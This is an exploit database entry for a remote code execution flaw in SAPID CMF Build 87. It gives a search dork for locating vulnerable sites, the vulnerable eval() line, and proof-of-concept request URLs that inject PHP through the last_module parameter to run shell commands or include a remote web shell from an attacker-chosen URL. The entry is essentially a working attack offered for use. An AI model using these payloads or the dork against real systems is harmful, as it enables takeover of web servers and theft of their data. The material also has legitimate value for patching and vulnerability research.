SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability

2008-02-10T00:00:00
ID 1337DAY-ID-2624
Type zdt
Reporter GoLd_M
Modified 2008-02-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
====================================================================




### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09:  */

eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)




#  0day.today [2018-01-05]  #